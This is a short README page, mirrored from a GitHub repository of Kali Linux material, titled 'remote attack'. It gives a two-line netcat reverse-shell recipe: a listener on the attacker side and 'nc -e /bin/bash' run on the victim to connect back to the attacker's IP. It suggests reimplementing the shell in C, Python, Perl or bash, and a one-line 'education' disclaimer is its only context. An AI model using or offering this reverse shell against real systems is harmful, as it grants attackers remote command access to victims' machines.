Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
nu11secur1ty
GitHub Repository: nu11secur1ty/Kali-Linux
Path: blob/master/NETCAT/README.MD
1303 views

remote attack

  • Attacker

nc -lnvp 77 -s 192.168.x.x
  • Victim

nc -e /bin/bash 192.168.x.x 77

Description:

192.168.x.x = attacker IP. You can customize this in C, Python, Perl, or bash programs. =)

WARNING:

Only for education!!!